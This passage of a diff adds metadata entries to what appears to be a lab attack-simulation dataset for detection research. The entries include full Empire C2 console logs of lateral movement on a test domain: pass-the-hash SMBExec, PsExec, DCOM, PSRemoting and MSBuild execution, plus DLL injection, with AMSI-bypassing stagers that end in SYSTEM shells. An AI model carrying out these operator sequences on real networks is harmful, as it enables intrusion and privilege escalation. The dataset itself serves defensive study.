TheHash/master/Invoke-SMBExec.ps1\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        7ADX8ZVR                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Username         True        pgustavo                  Username.                               \n  Domain           False       theshire                  Domain.                                 \n  Hash             True        81d310fa34e6a56a31145445  NTLM Hash in LM:NTLM or NTLM format.    \n                              891bb7b8                \n  Service          False                                 Name of service to create and delete.   \n                                                        Defaults to 20 char random.             \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_smbexec) > execute\n[*] Tasked 7ADX8ZVR to run TASK_CMD_WAIT\n[*] Agent 7ADX8ZVR tasked with task ID 3\n[*] Tasked agent 7ADX8ZVR to run module powershell/lateral_movement/invoke_smbexec\n(Empire: powershell/lateral_movement/invoke_smbexec) > \nCommand executed with service PGUJLOAKFQFVOMHGFQPX on WORKSTATION6.theshire.local\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent 3KL8YRUB checked in\n[+] Initial agent 3KL8YRUB from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 3KL8YRUB at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_smbexec) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \n7ADX8ZVR ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         8948   5/0.0    2020-09-20 06:57:53  http            \n\n3KL8YRUB ps 172.18.39.6     WORKSTATION6      *THESHIRE\\SYSTEM        powershell         1152   5/0.0    2020-09-20 06:57:49  http            \n\n(Empire: agents) > interact 3KL8YRUB\n(Empire: 3KL8YRUB) > shell whoami\n[*] Tasked 3KL8YRUB to run TASK_SHELL\n[*] Agent 3KL8YRUB tasked with task ID 1\n(Empire: 3KL8YRUB) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 3KL8YRUB) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:32.093296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518210652.yaml": {
+        "title": "Empire Invoke PsExec",
+        "id": "SDWIN-190518210652",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "RPC CreateService",
+            "RPC StartService",
+            "TCP Svcctl"
+        ],
+        "description": "This dataset represents adversaries remotely creating and starting a service via RPC methods over TCP.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psexec_dcerpc_tcp_svcctl.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psexec_dcerpc_tcp_svcctl.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "lateral_movement",
+                    "script": "https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/lateral_movement/Invoke-PsExec.ps1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 16:13:06  http            \n\n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n(Empire: powershell/lateral_movement/invoke_psexec) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psexec) > info\n\n              Name: Invoke-PsExec\n            Module: powershell/lateral_movement/invoke_psexec\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: True\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using PsExec type\n  functionality.\n\nComments:\n  https://github.com/rapid7/metasploit-\n  framework/blob/master/tools/psexec.rb\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        UF5MYK42                  Agent to run module on.                 \n  Listener         False                                 Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  ComputerName     True        ComputerName WORKSTATION6.theshire.local Host to execute the stager on.          \n  ServiceName      True        Updater                   The name of the service to create.      \n  Command          False                                 Custom command to execute on remote     \n                                                        hosts.                                  \n  ResultFile       False                                 Name of the file to write the results to\n                                                        on agent machine.                       \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_psexec) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked UF5MYK42 to run TASK_CMD_JOB\n[*] Agent UF5MYK42 tasked with task ID 1\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psexec\n(Empire: powershell/lateral_movement/invoke_psexec) > \nJob started: RNU5DY\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n\n[*] New agent 9CMNYX72 checked in\n[+] Initial agent 9CMNYX72 from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to 9CMNYX72 at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psexec) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 16:17:06  http            \n\n9CMNYX72 ps 172.18.39.6     WORKSTATION6      *THESHIRE\\SYSTEM        powershell         4312   5/0.0    2020-09-20 16:17:08  http            \n\n(Empire: agents) > interact 9CMNYX72\n(Empire: 9CMNYX72) > shell whoami\n[*] Tasked 9CMNYX72 to run TASK_SHELL\n[*] Agent 9CMNYX72 tasked with task ID 1\n(Empire: 9CMNYX72) > \nnt authority\\system\n\n..Command execution completed.\n\n(Empire: 9CMNYX72) > back"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:32.269298+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518211052.yaml": {
+        "title": "Empire Invoke DCOM ShellWindows",
+        "id": "SDWIN-190518211052",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/18",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "DCOM ShellWindows"
+        ],
+        "description": "This dataset represents adversaries executing commands remotely via DCOM ShellWindows COM Method.",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "003",
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_dcom_shellwindows_stager.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_dcom_shellwindows_stager.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "lateral_movement",
+                    "script": "https://github.com/EmpireProject/Empire/blob/master/data/module_source/lateral_movement/Invoke-DCOM.ps1"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 17:07:59  http            \n\n(Empire: agents) > interact A7BWPR32\n(Empire: A7BWPR32) > usemodule lusemodule lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > info\n\n              Name: Invoke-DCOM\n            Module: powershell/lateral_movement/invoke_dcom\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @rvrsh3ll\n\nDescription:\n  Execute a stager or command on remote hosts using DCOM.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        A7BWPR32                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6              Host[s] to execute the stager on, comma \n                                                        separated.                              \n  Method           True        ShellWindows              COM method to use. MMC20.Application,She\n                                                        llWindows,ShellBrowserWindow,ExcelDDE   \n  Listener         False       http                      Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_dcom) > execute\n[*] Tasked A7BWPR32 to run TASK_CMD_WAIT\n[*] Agent A7BWPR32 tasked with task ID 6\n[*] Tasked agent A7BWPR32 to run module powershell/lateral_movement/invoke_dcom\n(Empire: powershell/lateral_movement/invoke_dcom) > \nCompleted\n\n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent HBEW9G1D checked in\n[+] Initial agent HBEW9G1D from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to HBEW9G1D at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_dcom) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 17:08:46  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 17:08:47  http            \n\n(Empire: agents) > interact HBEW9G1D\n(Empire: HBEW9G1D) > shell whoami\n[*] Tasked HBEW9G1D to run TASK_SHELL\n[*] Agent HBEW9G1D tasked with task ID 1\n(Empire: HBEW9G1D) > \ntheshire\\sbeavers\n\n..Command execution completed.\n\n(Empire: HBEW9G1D) >",
+            "notes": [
+                "Windows Explorer must have an inbound rule to accept connections",
+                "A user must be logged in (Locked enpoint does not work). I had to RDP to lab box"
+            ]
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:32.447296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518211456.yaml": {
+        "title": "Empire Invoke PSRemoting",
+        "id": "SDWIN-190518211456",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "PowerShell Remoting"
+        ],
+        "description": "This dataset represents adversaries executing malicious code on remote hosts using PowerShell Remoting (WinRM).",
+        "attack_mappings": [
+            {
+                "technique": "T1021",
+                "sub-technique": "006",
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_psremoting_stager.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_psremoting_stager.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "invoke_psremoting",
+                    "script": "https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/lateral_movement/invoke_psremoting.py"
+                }
+            ],
+            "permissions_required": [
+                "User"
+            ],
+            "adversary_view": "(Empire: agents) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:05:28  http            \n\n(Empire: agents) > interact UF5MYK42\n(Empire: UF5MYK42) > usemodule lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_psremoting) > set Listener http\n(Empire: powershell/lateral_movement/invoke_psremoting) > info\n\n              Name: Invoke-PSRemoting\n            Module: powershell/lateral_movement/invoke_psremoting\n        NeedsAdmin: False\n        OpsecSafe: True\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @harmj0y\n\nDescription:\n  Executes a stager on remote hosts using PSRemoting.\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        UF5MYK42                  Agent to run module on.                 \n  CredID           False                                 CredID from the store to use.           \n  ComputerName     True        WORKSTATION6.theshire.lo  Host[s] to execute the stager on, comma \n                              cal                       separated.                              \n  Listener         True        http                      Listener to use.                        \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  UserName         False                                 [domain\\]username to use to execute     \n                                                        command.                                \n  Password         False                                 Password to use to execute command.     \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n\n(Empire: powershell/lateral_movement/invoke_psremoting) > execute\n[*] Tasked UF5MYK42 to run TASK_CMD_WAIT\n[*] Agent UF5MYK42 tasked with task ID 2\n[*] Tasked agent UF5MYK42 to run module powershell/lateral_movement/invoke_psremoting\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent L86DT27X checked in\n[+] Initial agent L86DT27X from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to L86DT27X at 172.18.39.6\n\n(Empire: powershell/lateral_movement/invoke_psremoting) > \n(Empire: powershell/lateral_movement/invoke_psremoting) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:09:08  http            \n\nL86DT27X ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         10116  5/0.0    2020-09-20 21:09:23  http            \n\n(Empire: agents) > interact L86DT27X\n(Empire: L86DT27X) > shell whoami\n[*] Tasked L86DT27X to run TASK_SHELL\n[*] Agent L86DT27X tasked with task ID 1\n(Empire: L86DT27X) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: L86DT27X) >"
+        },
+        "references": null,
+        "mp_last_updated": "2022-01-08T01:49:32.652296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518213907.yaml": {
+        "title": "Empire Invoke Execute MSBuild",
+        "id": "SDWIN-190518213907",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2019/05/18",
+        "modification_date": "2020/09/20",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "WMI IWbemServices ExecMethod",
+            "SMB CreateRequest"
+        ],
+        "description": "This dataset represents an adversary remotely creating a file (.xml) via SMB and executing it remotetly via WMI and msbuild. This dataset focuses on the use of the WMI Win32_Process class and method Create to execute code remotely.",
+        "attack_mappings": [
+            {
+                "technique": "T1047",
+                "sub-technique": null,
+                "tactics": [
+                    "TA0002",
+                    "TA0008"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/host/empire_msbuild_dcerpc_wmi_smb.zip"
+            },
+            {
+                "type": "Network",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/lateral_movement/network/empire_msbuild_dcerpc_wmi_smb.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "invoke_executemsbuild",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/lateral_movement/Invoke-ExecuteMSBuild.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire: stager/multi/launcher) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http            \nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-20 21:33:05  http            \n\n(Empire: agents) > interact AWTK7BX5  \n(Empire: AWTK7BX5) > usemodule lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > info\n\n              Name: Invoke-ExecuteMSBuild\n            Module: powershell/lateral_movement/invoke_executemsbuild\n        NeedsAdmin: False\n        OpsecSafe: False\n          Language: powershell\nMinLanguageVersion: 2\n        Background: False\n  OutputExtension: None\n\nAuthors:\n  @xorrior\n\nDescription:\n  This module utilizes WMI and MSBuild to compile and execute\n  an xml file containing an Empire launcher\n\nComments:\n  Inspired by @subtee\n  http://subt0x10.blogspot.com/2016/09/bypassing-application-\n  whitelisting.html\n\nOptions:\n\n  Name             Required    Value                     Description\n  ----             --------    -------                   -----------\n  Agent            True        AWTK7BX5                  Agent to run module from.               \n  Listener         False                                 Listener to use.                        \n  Command          False                                 Custom command to run.                  \n  Obfuscate        False       False                     Switch. Obfuscate the launcher          \n                                                        powershell code, uses the               \n                                                        ObfuscateCommand for obfuscation types. \n                                                        For powershell only.                    \n  ObfuscateCommand False       Token\\All\\1               The Invoke-Obfuscation command to use.  \n                                                        Only used if Obfuscate switch is True.  \n                                                        For powershell only.                    \n  AMSIBypass       False       True                      Include mattifestation's AMSI Bypass in \n                                                        the stager code.                        \n  AMSIBypass2      False       False                     Include Tal Liberman's AMSI Bypass in   \n                                                        the stager code.                        \n  CredID           False                                 CredID from the store to use.           \n  UserAgent        False       default                   User-agent string to use for the staging\n                                                        request (default, none, or other).      \n  Proxy            False       default                   Proxy to use for request (default, none,\n                                                        or other).                              \n  ProxyCreds       False       default                   Proxy credentials                       \n                                                        ([domain\\]username:password) to use for \n                                                        request (default, none, or other).      \n  ComputerName     True                                  Host to target                          \n  UserName         False                                 UserName if executing with credentials  \n  Password         False                                 Password if executing with credentials  \n  FilePath         False                                 Desired location to copy the xml file on\n                                                        the target                              \n  DriveLetter      False                                 Drive letter to use when mounting the   \n                                                        share locally                           \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set Listener http\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > set ComputerName WORKSTATION6.theshire.local\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > execute\n[>] Module is not opsec safe, run? [y/N] y\n[*] Tasked AWTK7BX5 to run TASK_CMD_WAIT\n[*] Agent AWTK7BX5 tasked with task ID 1\n[*] Tasked agent AWTK7BX5 to run module powershell/lateral_movement/invoke_executemsbuild\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n[*] Sending POWERSHELL stager (stage 1) to 172.18.39.6\n[*] New agent U63RL1XZ checked in\n[+] Initial agent U63RL1XZ from 172.18.39.6 now active (Slack)\n[*] Sending agent (stage 2) to U63RL1XZ at 172.18.39.6\n\n__GENUS          : 2\n__CLASS          : __PARAMETERS\n__SUPERCLASS     : \n__DYNASTY        : __PARAMETERS\n__RELPATH        : \n__PROPERTY_COUNT : 2\n__DERIVATION     : {}\n__SERVER         : \n__NAMESPACE      : \n__PATH           : \nProcessId        : 6952\nReturnValue      : 0\nPSComputerName   : \n\n(Empire: powershell/lateral_movement/invoke_executemsbuild) > \n(Empire: powershell/lateral_movement/invoke_executemsbuild) > agents\n\n[*] Active agents:\n\nName     La Internal IP     Machine Name      Username                Process            PID    Delay    Last Seen            Listener\n----     -- -----------     ------------      --------                -------            ---    -----    ---------            ----------------\nA7BWPR32 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         5904   5/0.0    2020-09-18 18:29:36  http            \nHBEW9G1D ps 172.18.39.6     WORKSTATION6      THESHIRE\\sbeavers       powershell         6036   5/0.0    2020-09-18 18:15:39  http            \nUF5MYK42 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         6404   5/0.0    2020-09-20 21:28:07  http\nAWTK7BX5 ps 172.18.39.5     WORKSTATION5      *THESHIRE\\pgustavo      powershell         2228   5/0.0    2020-09-20 21:39:34  http            \nU63RL1XZ ps 172.18.39.6     WORKSTATION6      *THESHIRE\\pgustavo      powershell         3008   5/0.0    2020-09-20 21:39:35  http            \n\n(Empire: agents) > interact U63RL1XZ\n(Empire: U63RL1XZ) > shell whoami\n[*] Tasked U63RL1XZ to run TASK_SHELL\n[*] Agent U63RL1XZ tasked with task ID 1\n(Empire: U63RL1XZ) > \ntheshire\\pgustavo\n\n..Command execution completed.\n\n(Empire: U63RL1XZ) >"
+        },
+        "references": [
+            "https://blog.f-secure.com/endpoint-detection-of-remote-service-creation-and-psexec/"
+        ],
+        "mp_last_updated": "2022-01-08T01:49:32.857296+00:00"
+    },
+    "datasets/atomic/_metadata/SDWIN-190518221344.yaml": {
+        "title": "Empire Invoke DLLInjection",
+        "id": "SDWIN-190518221344",
+        "contributors": [
+            "Roberto Rodriguez @Cyb3rWard0g"
+        ],
+        "creation_date": "2020/07/22",
+        "modification_date": "2020/09/21",
+        "platform": [
+            "Windows"
+        ],
+        "type": "atomic",
+        "tags": [
+            "DLL Injection",
+            "LoadLibrary",
+            "CreateRemoteThread Execution"
+        ],
+        "description": "This dataset represents a threat actor injecting a Dll (On Disk) into an arbitrary process via LoadLibrary and executd by CreateRemoteThread APIs",
+        "attack_mappings": [
+            {
+                "technique": "T1055",
+                "sub-technique": "001",
+                "tactics": [
+                    "TA0004",
+                    "TA0005"
+                ]
+            }
+        ],
+        "notebooks": null,
+        "files": [
+            {
+                "type": "Host",
+                "link": "https://raw.githubusercontent.com/OTRF/Security-Datasets/master/datasets/atomic/windows/defense_evasion/host/empire_dllinjection_LoadLibrary_CreateRemoteThread.zip"
+            }
+        ],
+        "simulation": {
+            "environment": "Mordor shire",
+            "tools": [
+                {
+                    "type": "C2",
+                    "name": "Empire",
+                    "module": "invoke_dllinjection",
+                    "script": "https://github.com/EmpireProject/Empire/blob/dev/data/module_source/code_execution/Invoke-DllInjection.ps1"
+                }
+            ],
+            "permissions_required": [
+                "Administrator"
+            ],
+            "adversary_view": "(Empire) > usestager windows/dll\n(Empire: stager/windows/dll) > \n(Empire: stager/windows/dll) > set Listener http\n(Empire: stager/windows/dll) > info\n\nName: DLL Launcher\n\nDescription:\n  Generate a PowerPick Reflective DLL to inject with\n  stager code.\n\nOptions:\n\n  Name             Required    Value             Description\n  ----             --------    -------           -----------\n  Listener         True        http              Listener to use.\n  Language         True        powershell        Language of the stager to generate.\n  Arch             True        x64               Architecture of the .dll to generate\n                                                (x64 or x86).\n  StagerRetries    False       0                 Times for the stager to retry\n                                                connecting.\n  UserAgent        False       default           User-agent string to use for the staging\n                                                request (default, none, or other).\n  Proxy            False       default           Proxy to use for request (default, none,\n                                                or other).\n  ProxyCreds       False       default           Proxy credentials\n                                                ([domain\\]username:password) to use for\n                                                request (default, none, or other).\n  OutFile          True        /tmp/launcher.dll File to output dll to.\n  Obfuscate        False       False             Switch. Obfuscate the launcher\n                                                powershell code, uses the\n                                                ObfuscateCommand for obfuscation types.\n                                                For powershell only.\n  ObfuscateCommand False       Token\\All\\1       The Invoke-Obfuscation command to use.\n                                                Only used if Obfuscate switch is True.\n                                                For powershell only.\n\n\n(Empire: stager/windows/dll) > execute\n\n[*] Stager output written 